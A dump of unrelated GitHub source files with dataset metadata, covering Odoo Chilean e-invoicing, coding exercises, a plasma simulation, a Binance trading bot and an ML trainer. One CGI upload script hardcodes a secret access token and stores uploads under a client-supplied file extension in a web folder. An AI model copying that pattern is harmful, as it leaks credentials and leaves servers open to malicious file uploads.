unescape(dte_rendered.decode('utf-8')).replace('',\n '')\n dte_signed = self._sign_full_xml(\n dte_rendered, digital_signature, 'SetDoc',\n self.l10n_latam_document_type_id._is_doc_type_voucher() and 'bol' or 'env',\n self.l10n_latam_document_type_id._is_doc_type_voucher()\n )\n return dte_signed, file_name\n\n def ccu_l10n_cl_send_dte_to_sii(self, retry_send=True):\n \"\"\"\n Send the DTE to the SII. It will be\n \"\"\"\n # INVOICE SERVER\n if self.company_id.l10n_cl_dte_voucher_service_provider == self.company_id.INVOICE_SERVER:\n digital_signature = self.company_id._get_digital_signature(user_id=self.env.user.id)\n response = self._send_xml_to_sii(\n self.company_id.l10n_cl_dte_service_provider,\n self.company_id.website,\n self.company_id.vat,\n self.l10n_cl_sii_send_file.name,\n base64.b64decode(self.l10n_cl_sii_send_file.datas),\n digital_signature\n )\n if not response:\n return None\n\n response_parsed = etree.fromstring(response)\n self.l10n_cl_sii_send_ident = response_parsed.findtext('TRACKID')\n sii_response_status = response_parsed.findtext('STATUS')\n if sii_response_status == '5':\n digital_signature.last_token = False\n _logger.error('The response status is %s. Clearing the token.' 
%\n self._l10n_cl_get_sii_reception_status_message(sii_response_status))\n if retry_send:\n _logger.info('Retrying send DTE to SII')\n self.l10n_cl_send_dte_to_sii(retry_send=False)\n\n # cleans the token and keeps the l10n_cl_dte_status until new attempt to connect\n # would like to resend from here, because we cannot wait till tomorrow to attempt\n # a new send\n else:\n self.l10n_cl_dte_status = 'ask_for_status' if sii_response_status == '0' else 'rejected'\n self.message_post(\n body=_('DTE has been sent to SII with response: %s.') % self._l10n_cl_get_sii_reception_status_message(\n sii_response_status))\n if self.company_id.l10n_cl_dte_voucher_service_provider == self.company_id.VOUCHER_SERVER:\n digital_signature = self.company_id._get_digital_signature(user_id=self.env.user.id)\n response = self._ccu_send_xml_to_sii(\n self.company_id.l10n_cl_dte_service_provider,\n self.company_id.website,\n self.company_id.vat,\n self.l10n_cl_sii_send_file.name,\n base64.b64decode(self.l10n_cl_sii_send_file.datas),\n digital_signature\n )\n if not response:\n return None\n\n response_parsed = etree.fromstring(response)\n self.l10n_cl_sii_send_ident = response_parsed.findtext('TRACKID')\n sii_response_status = response_parsed.findtext('STATUS')\n if sii_response_status == '5':\n digital_signature.last_token = False\n _logger.error('The response status is %s. Clearing the token.' %\n self._l10n_cl_get_sii_reception_status_message(sii_response_status))\n if retry_send:\n _logger.info('Retrying send DTE to SII')\n self.l10n_cl_send_dte_to_sii(retry_send=False)\n\n # cleans the token and keeps the l10n_cl_dte_status until new attempt to connect\n # would like to resend from here, because we cannot wait till tomorrow to attempt\n # a new send\n else:\n self.l10n_cl_dte_status = 'ask_for_status' if sii_response_status == '0' else 'rejected'\n self.message_post(\n body=_('DTE has been sent to SII with response: %s.') % self._l10n_cl_get_sii_reception_status_message(\n sii_response_status))\n\n","repo_name":"marcobustamanteab/odoo-pos","sub_path":"src/custom-addons/ccu_l10n_cl_edi/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":9569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5141087224","text":"import inflect\np = inflect.engine()\nimport sys\n\nlist = []\nwhile True:\n try:\n name = input(\"Name:\")\n if len(name) == 0:\n sys.exit()\n list.append(name)\n except EOFError:\n print(\"Adieu, adieu, to \" + p.join(list))\n break\n else:\n continue\n","repo_name":"dorabz/CS50-s-Introduction-to-Programming-with-Python","sub_path":"problem_set_4/adieu/adieu.py","file_name":"adieu.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26730069497","text":"def xor(n):\n xor = n if not n % 2 else 0\n return xor + 1 * int(0 < n % 4 < 3)\n \n\ndef solution(start, length):\n checksum = 0\n n = start\n for i in range(length, 0, -1):\n checksum ^= xor(n+i-1)^xor(n-1)\n n += length\n\n return checksum","repo_name":"korkmaz-arda/google-foobar-2023","sub_path":"level3/queue-to-do/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5370966472","text":"# key_rules_fc.py\n\nfrom __future__ import with_statement\nfrom pyke import contexts, pattern, fc_rule, 
knowledge_base\n\npyke_version = '1.1.1'\ncompiler_version = 1\n\ndef take(rule, context = None, index = None):\n engine = rule.rule_base.engine\n if context is None: context = contexts.simple_context()\n try:\n with knowledge_base.Gen_once if index == 0 \\\n else engine.lookup('chest', 'closed', context,\n rule.foreach_patterns(0)) \\\n as gen_0:\n for dummy in gen_0:\n with knowledge_base.Gen_once if index == 1 \\\n else engine.lookup('key', 'inChest', context,\n rule.foreach_patterns(1)) \\\n as gen_1:\n for dummy in gen_1:\n engine.assert_('key', 'inChest',\n (rule.pattern(0).as_data(context),)),\n rule.rule_base.num_fc_rules_triggered += 1\n finally:\n context.done()\n\ndef populate(engine):\n This_rule_base = engine.get_create('key_rules')\n \n fc_rule.fc_rule('take', This_rule_base, take,\n (('chest', 'closed',\n (pattern.pattern_literal(False),),\n False),\n ('key', 'inChest',\n (pattern.pattern_literal(True),),\n False),),\n (pattern.pattern_literal(False),))\n\n\nKrb_filename = '../KB/key_rules.krb'\nKrb_lineno_map = (\n ((13, 17), (5, 5)),\n ((18, 22), (6, 6)),\n ((23, 24), (8, 8)),\n)\n","repo_name":"AriiMoose/Tall-Tales","sub_path":"TestGame/compiled_krb/key_rules_fc.py","file_name":"key_rules_fc.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10845780902","text":"#!/usr/bin/env python\nimport base64\nimport cgi\nimport json\nimport os\nimport random\nimport string\nimport sys\n\nTOKEN = \"{0c7W8pC8~}V5TPG05Y6mV,q9^,@4+x!$y4;]13'7'O{eb5+8,ig;}q).@42U(^`664)9=1H!<$R135V@;01%:!85l40('75a`'w26*89P1/0%5@;16,>xL`v}U1c6\"\nURL = \"https://scrnsht.xyz/\"\n\ndef output(returnData = []):\n print(\"Content-Type: application/json\")\n print()\n print(json.dumps(returnData))\n\ndef generateName(filetype):\n valid = False\n\n while not valid:\n name = str(random.randint(10000, 99999)).encode()\n hashName = base64.b64encode(name).decode(\"utf-8\")\n for char in hashName:\n if char in string.punctuation:\n hashName = hashName.replace(char, \"\")\n name = hashName + \".\" + filetype\n if not os.path.exists(\"./\" + name):\n valid = True\n return name\n\nif __name__ == \"__main__\":\n try:\n data = json.loads(sys.stdin.read())\n if len(data) == 0 or data['image'] == None or data['token'] == \"\" or data['name'] == \"\":\n output({\"error\": \"Invalid input.\"})\n\n else:\n if data['token'] != TOKEN:\n output({\"error\": \"Invalid token.\"})\n\n else:\n filetype = data['name'].split(\".\")[1]\n filename = generateName(filetype)\n image = base64.b64decode(data['image'])\n\n try:\n with open(filename, 'wb') as imgFile:\n imgFile.write(image)\n\n output({\"href\": URL + filename})\n\n except IOError as e:\n output({\"error\": e})\n except:\n cgi.print_exception()\n","repo_name":"MattAnderson18/TokenUpload-PythonBackend","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20255726477","text":"import numpy as np\nimport pandas as pd\nfrom fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nfrom datetime import datetime\n\n# Fuzzy Logic\ndef symbol(x):\n sym = [\"(\", \")\", \" \", \"\\s+\", \"ซอย\", \"ถนน\", \"-\", \".\", \"ฯ\"]\n for i in sym:\n x = x.replace(i, \"\")\n return x\n\n\ndef fuzzy_match(row):\n try:\n matched_str, ratio, index = process.extractOne(row['FILE_A_sym'], FILE_B['FILE_B_sym'])\n row['FILE_B_sym'] = matched_str\n 
row['RAW_FILE_B'] = FILE_B[COL_B][index]\n row['score'] = ratio\n return row\n except:\n pass\n\nstart = datetime.now()\nprint(\"start at : \", start)\n\nFILE_A = pd.read_csv('project_name_comp.csv')\nFILE_B = pd.read_csv('project_name_subj.csv')\n\n# FILE_A = FILE_A.head(10)\nFILE_B = FILE_B.head(10)\n\nCOL_A = 'project_name_th'\nCOL_B = 'project_name'\n\nFILE_A['FILE_A_sym'] = FILE_A[COL_A].apply(symbol)\nFILE_B['FILE_B_sym'] = FILE_B[COL_B].apply(symbol)\n\nFILE_A = FILE_A.apply(fuzzy_match, axis=1)\nFILE_A.to_csv(\"RESULT.csv\", index=None, encoding='utf-8-sig')\nend = datetime.now()\nprint(\"end at : \", end)\nprint(\"------- \",end-start,\" -------\")\n","repo_name":"namking111/word-matching","sub_path":"fuzzy_logic.py","file_name":"fuzzy_logic.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34686995264","text":"import sys\nsys.path.append(r\"c:\\python\")\nfrom wsg import *\n\nab = lambda:appuifw.note(cn(\"Hello World!\"))\n\ndef main():\n a = Window()\n PushButton(a,cn(\"弹出\"),20,20,80,30,ab)\n b = GroupButton(a,cn(\"组框\"),20,60,100,70)\n PushButton(b,cn(\"嵌套\"),10,20,80,30,ab)\n CheckButton(a,cn(\"检查\"),20,150,52,20)\n RadioButton(a,cn(\"互斥\"),20,180,52,20).SetState(1)\n SysLink(a,cn(\"超链\"),20,210,36,20,ab)\n StaticText(a,cn(\"静态文本\"),20,240,68,20,0xFF0000)\n StaticEdit(a,cn(\"类Windows XP的GUI框架(实际并未模拟消息循环),目前封了PushButton,CheckButton,RadioButton,GroupButton,SysLink,StaticText(单行),StaticEdit,但还不支持动态添加控件。此为静态编辑控件(暂时还不能编辑...),操作:焦点移动到此控件,按下OK键即进入滚动状态(当然以可以滚动为前提),再次按下OK键则离开滚动状态。\"),80,135,120,100)\n Trackbar(a,20,280,200,34,5,0,100,30,True,u\"%.2f\",Trackbar.FOLLOW,0x808080,12)\n a.run()\n \nmain()","repo_name":"zixing131/Pys60_Simulator","sub_path":"Pys60_Simulator/softwares/wsg/demo3.py","file_name":"demo3.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"81"} +{"seq_id":"20306723328","text":"from time import sleep\n\nimport pytest\nimport yaml\n\nfrom hgwz_test.hgwz_appium.企业微信作业二.page.app import App\n\n\ndef get_contack():\n with open('../data/contack.yaml', 'rb') as f:\n datas = yaml.safe_load(f)\n return datas\n\n\nclass TestWexin:\n\n def setup(self):\n \"\"\"启动APP\"\"\"\n self.app = App()\n self.main = self.app.start().goto_main()\n\n def teardown(self):\n self.app.stop()\n\n @pytest.mark.parametrize('name,phone,address', get_contack(), ids=['新姓名1'])\n def test_addcontack(self, name, phone, address):\n mypage = self.main.goto_addresslist().add_member() \\\n .addmember_menual().edit_name(name).edit_phone(phone) \\\n .click_address().add_address(address).click_ok().click_save()\n mytoast = mypage.get_toast()\n assert mytoast == '添加成功'\n\n @pytest.mark.parametrize('name,phone,address', get_contack(), ids=['新姓名1'])\n def test_delcontack(self, name, phone, address):\n mypage = self.main.goto_addresslist().goto_address_manage().goto_revmessage(name) \\\n .del_mess().click_ok()\n sleep(1)\n mylist = mypage.get_list()\n assert name not in mylist\n","repo_name":"he56jian/hgwz_test","sub_path":"hgwz_appium/企业微信作业二/test_case/test_contack.py","file_name":"test_contack.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32184569048","text":"class ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def removeNthFromEnd(self, head: 
ListNode, n: int) -> ListNode:\n if not head: return head\n dummy = ListNode(0, head)\n p, q = head, dummy\n k = 1\n while p.next:\n p = p.next\n k += 1\n step = k - n\n while step:\n q = q.next\n step -= 1\n q.next = q.next.next\n return dummy.next\n\n\nif __name__ == '__main__':\n node1 = ListNode(1)\n node2 = ListNode(2)\n node3 = ListNode(3)\n node4 = ListNode(4)\n node5 = ListNode(5)\n\n\n node1.next = node2\n node2.next = node3\n node3.next = node4\n node4.next = node5\n node5.next = None\n\n\n solution = Solution()\n head = solution.removeNthFromEnd(node1, 2)\n print('删除第k个节点后,头结点为{},其值为{}'.format(head, head.val))\n\n while head != None:\n print(head.val)\n head = head.next","repo_name":"THZdyjy/algorithm-progress","sub_path":"链表/删除第k个链表.py","file_name":"删除第k个链表.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10749002686","text":"import cycle\r\nimport numpy\r\nfrom tqdm import tqdm\r\nimport os\r\nimport click\r\nimport json\r\n\r\n\r\n@click.command()\r\n@click.argument(\"jsonfile\") # Input JSON file as command-line argument\r\ndef main(jsonfile):\r\n\r\n # Make sure JSON file was included\r\n if not os.path.isfile(jsonfile):\r\n print(\"ERROR! Please include a parameters JSON file.\")\r\n return\r\n\r\n # Read JSON file and make sure is well written\r\n with open(jsonfile, \"r\") as json_input:\r\n try:\r\n root = json.load(json_input)\r\n except json.decoder.JSONDecodeError as error:\r\n print(\"ERROR! Corrupted JSON file.\\n\")\r\n print(error)\r\n return\r\n\r\n results = root.get(\"results\", [])\r\n samplefile = root.get(\"sample\", None)\r\n outputName = root.get(\"output\", \"data\")\r\n\r\n # Make sure sample file was given\r\n if not samplefile:\r\n print(\"ERROR! Sample file not found in JSON file.\")\r\n return\r\n\r\n # Make sure sample file exists\r\n if not os.path.isfile(samplefile):\r\n print(\"ERROR! Sample file not found.\")\r\n return\r\n\r\n writeSpace = (\"space\" in results)\r\n writeVelocities = (\"velocities\" in results)\r\n writePhaseSpace = (\"phase_space\" in results)\r\n writeEfield = (\"electric_field\" in results)\r\n writePhi = (\"electric_potential\" in results)\r\n writeRho = (\"charge_density\" in results)\r\n\r\n steps = root.get(\"steps\", 50)\r\n ss_freq = root.get(\"ss_frequency\", 10)\r\n dt = root.get(\"dt\", 0.1)\r\n\r\n NP = root.get(\"N\", None)\r\n\r\n # Make sure number of particles was given\r\n if not NP:\r\n print(\"ERROR! Number of particles \\\"N\\\" not found in JSON file.\")\r\n return\r\n\r\n Bext = numpy.array(root.get(\"Bfield\", [0.0, 0.0, 0.0]))\r\n\r\n # Make sure external magnetic field has three components\r\n if len(Bext) != 3:\r\n print(\"ERROR! Magnetic field must have three components.\")\r\n return\r\n\r\n gridSize = root.get(\"grid_size\", [16, 16])\r\n\r\n # Make sure number of nodes has two components\r\n if len(gridSize) != 2:\r\n print(\"ERROR! Grid size must have two components!\")\r\n return\r\n\r\n sys_length = root.get(\"sys_length\", [1.0, 1.0])\r\n\r\n # Make sure length of the system has two components\r\n if len(sys_length) != 2:\r\n print(\"ERROR! 
System length must have two components\")\r\n return\r\n\r\n Lx, Ly = sys_length\r\n NGx, NGy = gridSize\r\n\r\n dx = Lx / NGx\r\n dy = Ly / NGy\r\n\r\n sample = root[\"sample\"]\r\n\r\n # Read the sample file and make sure is well written\r\n try:\r\n positions = numpy.loadtxt(sample, usecols=(0, 1), unpack=True).T\r\n except IndexError as error:\r\n print(\"ERROR! Not enough columns in some row of the sample file\")\r\n print(\"Make sure that the file is well written!\")\r\n return\r\n\r\n if len(positions) != NP:\r\n print(\"ERROR! Number of particles in JSON file does not match number of rows in sample file\\n\")\r\n print(\"In JSON file: \" + str(NP) + \"\\n\")\r\n print(\"In sample file: \" + str(len(positions)))\r\n return\r\n\r\n try:\r\n velocities = numpy.loadtxt(sample, usecols=(2, 3, 4), unpack=True).T\r\n except IndexError as error:\r\n print(\"ERROR! Not enough columns in some row of the sample file\")\r\n print(\"Make sure that the file is well written!\")\r\n return\r\n\r\n try:\r\n QoverM, moves = numpy.loadtxt(sample, usecols=(5, 6), unpack=True)\r\n except IndexError as error:\r\n print(\"ERROR! Not enough columns in some row of the sample file\")\r\n print(\"Make sure that the file is well written!\")\r\n return\r\n\r\n charges = Lx * Ly * QoverM / NP\r\n masses = charges / QoverM\r\n\r\n # Obtain the indexes of the moving particles\r\n move_indexes, = numpy.where(moves == 1)\r\n\r\n # External magnetic field acting on each particle\r\n Bext = numpy.full((len(move_indexes), 3), Bext)\r\n\r\n folders = [\"/energy\"]\r\n if writeSpace:\r\n folders.append(\"/space\")\r\n if writeVelocities:\r\n folders.append(\"/velocities\")\r\n if writePhaseSpace:\r\n folders.append(\"/phase_space\")\r\n if writeEfield:\r\n folders.append(\"/Efield\")\r\n if writePhi:\r\n folders.append(\"/phi\")\r\n if writeRho:\r\n folders.append(\"/rho\")\r\n\r\n # Create folders to store output\r\n for f in folders:\r\n if not os.path.exists(outputName + f):\r\n os.makedirs(outputName + f)\r\n\r\n # Auxiliary vectors for Boris algorithm v1 and v2\r\n\r\n # v1 is usually named t and v2 is usually named s, but I don't want t\r\n # to be confused with time.\r\n\r\n v1 = 0.5 * QoverM[move_indexes, numpy.newaxis] * Bext * dt\r\n\r\n # Magnitude of v1 squared\r\n v1_2 = numpy.linalg.norm(v1, axis=1) * numpy.linalg.norm(v1, axis=1)\r\n v2 = (2 * v1) / (1 + v1_2[:, numpy.newaxis])\r\n\r\n energy = open(\r\n \"{}/energy/energy.dat\".format(outputName), \"w\")\r\n\r\n print(\"Simulation running...\\n\")\r\n print(\"Saving data each {} steps.\".format(ss_freq))\r\n\r\n # Main cycle\r\n for step in tqdm(range(steps)):\r\n # Whether or not write output for this time step\r\n writeStep = (step % ss_freq == 0)\r\n\r\n # Origin nodes arrays of each cell that has at least a particle in it.\r\n currentNodesX = numpy.array(positions[:, 0] / dx, dtype=int)\r\n currentNodesY = numpy.array(positions[:, 1] / dy, dtype=int)\r\n\r\n # Neighbor nodes of the origin nodes of each cell\r\n nxtX = (currentNodesX + 1) % NGx\r\n nxtY = (currentNodesY + 1) % NGy\r\n\r\n # Unite both arrays into one\r\n currentX_currentY = currentNodesX + currentNodesY * NGx\r\n\r\n # Calculate particles relative position (hx, hy) in each cell\r\n hx = positions[:, 0] - (currentNodesX * dx)\r\n hy = positions[:, 1] - (currentNodesY * dy)\r\n\r\n # Get the particles indexes that are inside of each cell\r\n indexesInNode = numpy.array([numpy.where(currentX_currentY == node)[\r\n 0] for node in range(NGx * NGy)])\r\n\r\n\r\n # Step 1: compute rho\r\n 
rho = cycle.density(NGx, NGy, dx, dy, hx, hy, currentNodesX,\r\n currentNodesY, nxtX, nxtY, indexesInNode, charges)\r\n\r\n # Step 2: from rho, compute phi\r\n phi = cycle.potential(NGx, NGy, dx, dy, rho)\r\n\r\n # Step 3: from phi, compute electric field on nodes\r\n E_n = cycle.field_n(NGx, NGy, dx, dy, phi)\r\n\r\n # Backwards interpolation, compute electric field acting on particles\r\n E_p = cycle.field_p(NP, dx, dy, E_n, currentNodesX,\r\n currentNodesY, hx, hy, nxtX, nxtY, move_indexes)\r\n\r\n # Initialize leapfrog scheme, outphase velocities backwards half time step.\r\n if step == 0:\r\n cycle.outphase(v1, v2, -1.0, velocities, QoverM,\r\n E_p, dt, move_indexes)\r\n\r\n # Step 4: update particles\r\n cycle.update(v1, v2, positions, velocities, QoverM,\r\n E_p, dt, Lx, Ly, move_indexes)\r\n\r\n final_velocities = numpy.copy(velocities)\r\n\r\n # Outphase velocities forward for energy calculations and writing output\r\n cycle.outphase(v1, v2, 1.0, final_velocities,\r\n QoverM, E_p, dt, move_indexes)\r\n\r\n # Write output specified in JSON file by user\r\n if (writeSpace and writeStep):\r\n space = open(\"{}/space/step_{}_.dat\".format(outputName, step), \"w\")\r\n space.write(\"# x y\\n\")\r\n\r\n if (writeVelocities and writeStep):\r\n vels = open(\r\n \"{}/velocities/step_{}_.dat\".format(outputName, step), \"w\")\r\n vels.write(\"# vx vy vz\\n\")\r\n\r\n if (writePhaseSpace and writeStep):\r\n phaseSpace = open(\r\n \"{}/phase_space/step_{}_.dat\".format(outputName, step), \"w\")\r\n phaseSpace.write(\"# x y vx vy vz\\n\")\r\n\r\n if (writeEfield and writeStep):\r\n electricField = open(\r\n \"{}/Efield/step_{}_.dat\".format(outputName, step), \"w\")\r\n electricField.write(\"# x y Ex Ey\\n\")\r\n\r\n if (writePhi and writeStep):\r\n electricPotential = open(\r\n \"{}/phi/step_{}_.dat\".format(outputName, step), \"w\")\r\n electricPotential.write(\"# x y phi\\n\")\r\n\r\n if (writeRho and writeStep):\r\n chargeDensity = open(\r\n \"{}/rho/step_{}_.dat\".format(outputName, step), \"w\")\r\n chargeDensity.write(\"# x y rho\\n\")\r\n\r\n # Compute kinetic and electrostatic energies\r\n KE = 0.0\r\n FE = 0.0\r\n\r\n for p in move_indexes:\r\n if (writePhaseSpace and writeStep):\r\n phaseSpace.write(\"{} {} {} {} {}\\n\".format(\r\n *positions[p], *final_velocities[p]))\r\n\r\n if (writeSpace and writeStep):\r\n space.write(\"{} {}\\n\".format(*positions[p]))\r\n\r\n if (writeVelocities and writeStep):\r\n vels.write(\"{} {} {}\\n\".format(*final_velocities[p]))\r\n\r\n # Compute kinetic energy\r\n KE += masses[p] * numpy.linalg.norm(\r\n final_velocities[p]) * numpy.linalg.norm(final_velocities[p])\r\n\r\n KE *= 0.5\r\n\r\n for i in range(NGx):\r\n for j in range(NGy):\r\n if (writeEfield and writeStep):\r\n electricField.write(\"{} {} {} {}\\n\".format(\r\n i * dx, j * dy, E_n[i][j][0], E_n[i][j][1]))\r\n if (writePhi and writeStep):\r\n electricPotential.write(\r\n \"{} {} {}\\n\".format(i * dx, j * dy, phi[i][j]))\r\n if (writeRho and writeStep):\r\n chargeDensity.write(\"{} {} {} {}\\n\".format(\r\n i * dx, j * dy, rho[i][j]))\r\n\r\n # Compute electrostatic energy\r\n FE += rho[i][j] * phi[i][j]\r\n\r\n FE *= 0.5\r\n\r\n # Write energy output\r\n energy.write(\"{} {} {}\\n\".format(step, KE, FE))\r\n\r\n # Close output files\r\n if (writePhaseSpace and writeStep):\r\n phaseSpace.close()\r\n if (writeSpace and writeStep):\r\n space.close()\r\n if (writeVelocities and writeStep):\r\n vels.close()\r\n if (writeEfield and writeStep):\r\n electricField.close()\r\n if (writePhi and 
writeStep):\r\n electricPotential.close()\r\n if (writeRho and writeStep):\r\n chargeDensity.close()\r\n\r\n energy.close()\r\n\r\n print(\"\\nSimulation finished!\\n\")\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"dfrodriguezp/PiCM","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10505,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"37338571303","text":"import math\r\n\r\na = int(input(\"Nhập a: \"))\r\nb = int(input(\"Nhập b: \"))\r\nc = int(input(\"Nhập c: \"))\r\n\r\ndelta = a*a - 4*b*c\r\n\r\nif delta < 0:\r\n print(\"Phương trình vô nghiệm\")\r\nelif delta == 0:\r\n x = (-b/(2*a))\r\n print(f\"Phương trình có nghiệm kép x = {x}\")\r\nelse:\r\n x1 = ((-b + math.sqrt(delta))/(2*a))\r\n x2 = ((-b - math.sqrt(delta))/(2*a))\r\n print(f\"Phương trình có 2 nghiệm x1 = {x1} và x2 = {x2}\")","repo_name":"NguyenPhucHoangAnh/Python","sub_path":"Lab01/Bai2/Cau8.py","file_name":"Cau8.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21505513840","text":"from test_strategy_carrusel.asset import Asset\nfrom binance.client import Client\n\napi_key = ''\napi_secret = ''\n\nclient = Client(api_key, api_secret)\n\n\nclass Methods(Asset):\n # Dictionary of exact decimal places for the specified currency pairs.\n asset_pairs_precision = {'ETHEUR': (4, 2),\n 'EURBUSD': (1, 3),\n 'ETHBUSD': (4, 2)}\n\n # calculates the exact amount of currency to be traded\n @classmethod\n def get_precise_qty(cls, obj_qty, precise_num):\n qty = str(obj_qty)\n qty = qty.split('.')\n right_side = qty[-1][:precise_num]\n result = qty[0] + '.' + right_side\n if precise_num == 0:\n result = qty[0]\n return float(result)\n\n # calculates whether current prices are suitable for trading profit\n @classmethod\n def check_for_profit(cls, asset_on_charge_qty, other_qty, price, profit_percentage, operation):\n if operation == 'multiply':\n relation = (asset_on_charge_qty * price) / other_qty\n if relation >= profit_percentage:\n return True\n else:\n relation = (asset_on_charge_qty / price) / other_qty\n if relation >= profit_percentage:\n return True\n return False\n\n @classmethod\n def execution(cls, obj_on_charge, other_obj, operation, objects, transactions_count):\n message= f'\\n-------EXECUTION-------\\nPair: active - {obj_on_charge.name} nonactive - {other_obj.name}' \\\n f'\\nOrder count: {transactions_count}'\n Methods.print_method(message)\n if operation == 'multiply':\n pair = f'{obj_on_charge.name}{other_obj.name}'\n precise_num = Methods.asset_pairs_precision[pair][0]\n trade_quantity = Methods.get_precise_qty(obj_on_charge.real_quantity, precise_num)\n curr_price = float(client.get_symbol_ticker(symbol=pair)['price'])\n other_obj.on_charge = True\n obj_on_charge.on_charge = False\n other_obj.real_quantity = trade_quantity * curr_price\n message = f'{trade_quantity} {obj_on_charge.name} on price {curr_price} -> {other_obj.real_quantity}'\n Methods.print_method(message)\n\n else:\n pair = f'{other_obj.name}{obj_on_charge.name}'\n precise_num = Methods.asset_pairs_precision[pair][1]\n trade_quantity = Methods.get_precise_qty(obj_on_charge.real_quantity, precise_num)\n curr_price = float(client.get_symbol_ticker(symbol=pair)['price']) * 1.0001\n trade_quantity /= curr_price\n precise_num = Methods.asset_pairs_precision[pair][0]\n trade_quantity = Methods.get_precise_qty(trade_quantity, precise_num)\n 
other_obj.on_charge = True\n obj_on_charge.on_charge = False\n curr_price = float(client.get_symbol_ticker(symbol=pair)['price'])\n other_obj.real_quantity = trade_quantity\n message = f'{trade_quantity * curr_price} {obj_on_charge.name} на цена {curr_price} -> {trade_quantity}'\n Methods.print_method(message)\n message = 'Active currencies:'\n Methods.print_method(message)\n for obj in objects:\n if obj.on_charge:\n message = f'{obj.name} profit {(obj.real_quantity / obj.init_qty - 1) * 100:.2f}%'\n Methods.print_method(message)\n\n @staticmethod\n def print_method(message):\n print(message)\n","repo_name":"Kiril-Lazarov/Crypto-trading-bots","sub_path":"test_strategy_carrusel/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"4638635401","text":"import os\nfrom tqdm import tqdm\nimport json\nimport torch\nimport torch.distributed as dist\nfrom torch.utils.data import distributed\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch_geometric.data import DataLoader, DataListLoader\nfrom argoverse.evaluation.eval_forecasting import get_displacement_errors_and_miss_rate\nimport gc\n\n\nclass Trainer(object):\n \"\"\"\n Trainer base class\n \"\"\"\n def __init__(self,\n trainset,\n evalset,\n testset,\n loader=DataLoader,\n batch_size: int=1,\n num_workers: int=1,\n lr: float=1e-3,\n betas=(0.9, 0.999),\n weight_decay: float=0.01,\n warmup_epoch=30,\n with_cuda: bool=False,\n cuda_device=None,\n enable_log: bool=False,\n log_freq: int=2,\n save_folder: str=\"\",\n verbose: bool=True\n ):\n \"\"\"\n :param trainset:\n :param evalset:\n :param testset:\n :param loader:\n :param batch_size:\n :param num_worker:\n :param lr:\n :param betas:\n :param weight_decay:\n :param warmup_epoch:\n :param with_cuda:\n :param cuda_device:\n :param enable_log:\n :param log_freq:\n :param save_folder:\n :param verbose: whether printing debug messages\n \"\"\"\n self.cuda_id = cuda_device if with_cuda and cuda_device else 0\n self.device = torch.device(\"cuda:{}\".format(self.cuda_id) if torch.cuda.is_available() and with_cuda else \"cpu\")\n\n torch.manual_seed(self.cuda_id)\n self.trainset = trainset\n self.evalset = evalset\n self.testset = testset\n self.batch_size = batch_size\n self.loader = loader\n\n self.train_loader = self.loader(self.trainset, batch_size=self.batch_size, num_workers=0, pin_memory=False,\n shuffle=False)\n self.eval_loader = self.loader(self.evalset, batch_size=self.batch_size, num_workers=0, pin_memory=False)\n self.test_loader = self.loader(self.testset, batch_size=self.batch_size, num_workers=0, pin_memory=False)\n\n # model\n self.model = None\n\n # optimizer params\n self.lr = lr\n self.betas = betas\n self.weight_decay = weight_decay\n self.warmup_epoch = warmup_epoch\n self.optim = None\n self.optim_schedule = None\n\n # criterion and metric\n self.criterion = None\n self.min_eval_loss = None\n self.best_metric = None\n\n # log\n self.enable_log = enable_log\n self.save_folder = save_folder\n self.logger = SummaryWriter(log_dir=os.path.join(self.save_folder, \"log\"))\n self.log_freq = log_freq\n self.verbose = verbose\n\n gc.enable()\n\n def train(self, epoch):\n gc.collect()\n\n self.model.train()\n return self.iteration(epoch, self.train_loader)\n\n def eval(self, epoch):\n gc.collect()\n\n self.model.eval()\n return self.iteration(epoch, self.eval_loader)\n\n def test(self, data):\n raise NotImplementedError\n\n def 
